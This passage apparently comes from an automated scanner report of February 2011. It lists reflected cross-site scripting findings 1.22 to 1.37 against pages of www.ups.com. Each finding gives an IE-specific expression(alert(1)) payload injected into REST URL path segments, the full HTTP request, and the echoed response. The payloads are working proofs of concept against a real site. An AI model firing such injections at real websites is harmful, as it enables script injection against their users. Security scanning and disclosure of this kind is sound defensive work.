GET /content/us/en74567"style%3d"x%3aexpression(alert(1))"c1726c9caa7/about/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46477


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en74567"style="x:expression(alert(1))"c1726c9caa7/about/index.html">
...[SNIP]...

1.22. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20091007_batteries.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b92"style%3d"x%3aexpression(alert(1))"42a5a1abd9f was submitted in the REST URL parameter 2. This input was echoed as 73b92"style="x:expression(alert(1))"42a5a1abd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us73b92"style%3d"x%3aexpression(alert(1))"42a5a1abd9f/en/about/news/service_updates/20091007_batteries.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39118


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us73b92"style="x:expression(alert(1))"42a5a1abd9f/en/about/news/service_updates/20091007_batteries.html">
...[SNIP]...

1.23. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20091007_batteries.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa1f"style%3d"x%3aexpression(alert(1))"2fac5398be1 was submitted in the REST URL parameter 3. This input was echoed as 9aa1f"style="x:expression(alert(1))"2fac5398be1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en9aa1f"style%3d"x%3aexpression(alert(1))"2fac5398be1/about/news/service_updates/20091007_batteries.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39118


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en9aa1f"style="x:expression(alert(1))"2fac5398be1/about/news/service_updates/20091007_batteries.html">
...[SNIP]...

1.24. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100120_on_call.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e708d"style%3d"x%3aexpression(alert(1))"1e47b8d55c1 was submitted in the REST URL parameter 2. This input was echoed as e708d"style="x:expression(alert(1))"1e47b8d55c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/use708d"style%3d"x%3aexpression(alert(1))"1e47b8d55c1/en/about/news/service_updates/20100120_on_call.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/use708d"style="x:expression(alert(1))"1e47b8d55c1/en/about/news/service_updates/20100120_on_call.html">
...[SNIP]...

1.25. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100120_on_call.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55c63"style%3d"x%3aexpression(alert(1))"76498229caa was submitted in the REST URL parameter 3. This input was echoed as 55c63"style="x:expression(alert(1))"76498229caa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en55c63"style%3d"x%3aexpression(alert(1))"76498229caa/about/news/service_updates/20100120_on_call.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en55c63"style="x:expression(alert(1))"76498229caa/about/news/service_updates/20100120_on_call.html">
...[SNIP]...

1.26. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aca67"style%3d"x%3aexpression(alert(1))"e8465dd6765 was submitted in the REST URL parameter 2. This input was echoed as aca67"style="x:expression(alert(1))"e8465dd6765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usaca67"style%3d"x%3aexpression(alert(1))"e8465dd6765/en/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usaca67"style="x:expression(alert(1))"e8465dd6765/en/about/news/service_updates/20100624_fraud.html">
...[SNIP]...

1.27. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e239"style%3d"x%3aexpression(alert(1))"aa66e09bfd8 was submitted in the REST URL parameter 3. This input was echoed as 1e239"style="x:expression(alert(1))"aa66e09bfd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en1e239"style%3d"x%3aexpression(alert(1))"aa66e09bfd8/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en1e239"style="x:expression(alert(1))"aa66e09bfd8/about/news/service_updates/20100624_fraud.html">
...[SNIP]...

1.28. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_investigation.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f09"style%3d"x%3aexpression(alert(1))"4a5c6425317 was submitted in the REST URL parameter 2. This input was echoed as 68f09"style="x:expression(alert(1))"4a5c6425317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us68f09"style%3d"x%3aexpression(alert(1))"4a5c6425317/en/about/news/service_updates/20101102_investigation.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us68f09"style="x:expression(alert(1))"4a5c6425317/en/about/news/service_updates/20101102_investigation.html">
...[SNIP]...

1.29. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_investigation.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96520"style%3d"x%3aexpression(alert(1))"18844fce5ae was submitted in the REST URL parameter 3. This input was echoed as 96520"style="x:expression(alert(1))"18844fce5ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en96520"style%3d"x%3aexpression(alert(1))"18844fce5ae/about/news/service_updates/20101102_investigation.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en96520"style="x:expression(alert(1))"18844fce5ae/about/news/service_updates/20101102_investigation.html">
...[SNIP]...

1.30. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_toner.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb22"style%3d"x%3aexpression(alert(1))"34b6ca681d4 was submitted in the REST URL parameter 2. This input was echoed as 4eb22"style="x:expression(alert(1))"34b6ca681d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us4eb22"style%3d"x%3aexpression(alert(1))"34b6ca681d4/en/about/news/service_updates/20101102_toner.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34171


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us4eb22"style="x:expression(alert(1))"34b6ca681d4/en/about/news/service_updates/20101102_toner.html">
...[SNIP]...

1.31. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_toner.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e6f"style%3d"x%3aexpression(alert(1))"5407b987dea was submitted in the REST URL parameter 3. This input was echoed as 40e6f"style="x:expression(alert(1))"5407b987dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en40e6f"style%3d"x%3aexpression(alert(1))"5407b987dea/about/news/service_updates/20101102_toner.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34171


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en40e6f"style="x:expression(alert(1))"5407b987dea/about/news/service_updates/20101102_toner.html">
...[SNIP]...

1.32. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101217_imp_cntrl.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 684d5"style%3d"x%3aexpression(alert(1))"735d7daa35a was submitted in the REST URL parameter 2. This input was echoed as 684d5"style="x:expression(alert(1))"735d7daa35a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us684d5"style%3d"x%3aexpression(alert(1))"735d7daa35a/en/about/news/service_updates/20101217_imp_cntrl.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34251


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us684d5"style="x:expression(alert(1))"735d7daa35a/en/about/news/service_updates/20101217_imp_cntrl.html">
...[SNIP]...

1.33. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101217_imp_cntrl.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0bf3"style%3d"x%3aexpression(alert(1))"ea82c99023a was submitted in the REST URL parameter 3. This input was echoed as f0bf3"style="x:expression(alert(1))"ea82c99023a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enf0bf3"style%3d"x%3aexpression(alert(1))"ea82c99023a/about/news/service_updates/20101217_imp_cntrl.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34251


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enf0bf3"style="x:expression(alert(1))"ea82c99023a/about/news/service_updates/20101217_imp_cntrl.html">
...[SNIP]...

1.34. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/retail_requirement.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34efe"style%3d"x%3aexpression(alert(1))"5e7fe6716d8 was submitted in the REST URL parameter 2. This input was echoed as 34efe"style="x:expression(alert(1))"5e7fe6716d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us34efe"style%3d"x%3aexpression(alert(1))"5e7fe6716d8/en/about/news/service_updates/retail_requirement.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us34efe"style="x:expression(alert(1))"5e7fe6716d8/en/about/news/service_updates/retail_requirement.html">
...[SNIP]...

1.35. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/retail_requirement.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11694"style%3d"x%3aexpression(alert(1))"b9967f4690e was submitted in the REST URL parameter 3. This input was echoed as 11694"style="x:expression(alert(1))"b9967f4690e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en11694"style%3d"x%3aexpression(alert(1))"b9967f4690e/about/news/service_updates/retail_requirement.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en11694"style="x:expression(alert(1))"b9967f4690e/about/news/service_updates/retail_requirement.html">
...[SNIP]...

1.36. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/sites.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ffa"style%3d"x%3aexpression(alert(1))"baeeaabbf7 was submitted in the REST URL parameter 2. This input was echoed as c4ffa"style="x:expression(alert(1))"baeeaabbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usc4ffa"style%3d"x%3aexpression(alert(1))"baeeaabbf7/en/about/sites.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44984


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usc4ffa"style="x:expression(alert(1))"baeeaabbf7/en/about/sites.html">
...[SNIP]...

1.37. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/sites.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b37ff"style%3d"x%3aexpression(alert(1))"31afa948299 was submitted in the REST URL parameter 3. This input was echoed as b37ff"style="x:expression(alert(1))"31afa948299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enb37ff"style%3d"x%3aexpression(alert(1))"31afa948299/about/sites.html HTTP/1.1
Host: www.ups.com
